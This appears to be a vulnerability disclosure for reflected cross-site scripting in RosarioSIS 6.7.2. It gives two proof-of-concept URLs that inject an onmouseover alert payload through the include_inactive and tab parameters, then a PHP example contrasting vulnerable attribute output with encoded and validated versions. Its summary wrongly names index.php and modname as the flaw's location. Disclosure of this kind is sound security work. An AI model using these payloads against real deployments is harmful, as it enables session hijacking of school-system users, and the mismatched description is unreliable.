RosarioSIS 6.7.2 Cross Site Scripting
RosarioSIS version 6.7.2 is susceptible to a reflected Cross-Site Scripting (XSS) vulnerability.

The flaw exists in the `index.php` file, specifically due to insufficient sanitization of the `modname` parameter. An attacker can craft a malicious URL containing JavaScript code within the `modname` parameter.

If an authenticated user clicks this crafted link, the malicious script is executed in their browser. This allows for session hijacking, unauthorized actions, data theft, or defacement of the application within the user's context.

The vulnerability was addressed in RosarioSIS version 6.7.3 through improved input validation and output encoding. Users are strongly advised to upgrade to the latest version to mitigate this risk.

# Exploit Title: RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15718

Proof Of Concept
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result.

# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:
1. User must be authenticated (as shown by the session checks in `Warehouse.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result.
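Both proofs of concept above break out of a quoted HTML attribute with a leading `"` and add an event-handler attribute. The following is an added illustration, not RosarioSIS code: it reproduces that attribute-context pattern in a constructed snippet and shows the two fixes the advisory names, output encoding and input validation. The `tab` sample value, the `render*` functions and the `modname` pattern are assumptions for the example.

```php
<?php
// Added illustration (not RosarioSIS code) of the attribute-context XSS
// described in the advisory and of the defences it names.

// Constructed sample input, modelled on the shape of the PoC payload above.
$tab = '" onmouseover="alert(1)" x="';

// VULNERABLE pattern: a request parameter is echoed straight into an HTML
// attribute. The leading quote closes value="..." and the remainder becomes
// a new event-handler attribute on the <input> element.
function renderVulnerable(string $tab): string
{
    return '<input type="hidden" name="tab" value="' . $tab . '">';
}

// Output encoding: ENT_QUOTES matters here. Before PHP 8.1 the default
// flags (ENT_COMPAT) left single quotes alone, so a single-quoted attribute
// stayed breakable. Encoding both quote styles turns the payload into
// inert text inside the attribute value.
function renderEncoded(string $tab): string
{
    $safe = htmlspecialchars($tab, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="tab" value="' . $safe . '">';
}

// Input validation: a parameter such as modname selects a file under
// Modules/, so it should match a known-good shape (or an allow-list of
// module paths) before any use, independently of how it is later rendered.
function validModname(string $modname): bool
{
    return (bool) preg_match('~^[A-Za-z0-9_]+/[A-Za-z0-9_]+\.php$~', $modname);
}

echo renderVulnerable($tab), PHP_EOL;
echo renderEncoded($tab), PHP_EOL;
var_dump(validModname('Users/Preferences.php'));
var_dump(validModname('Users/Preferences.php" onmouseover="alert(1)'));
```

Running it side by side makes the difference visible: the first line of output contains a live `onmouseover` attribute, the second carries the same characters as `&quot;`-encoded text, and only the well-formed module path passes validation.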
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸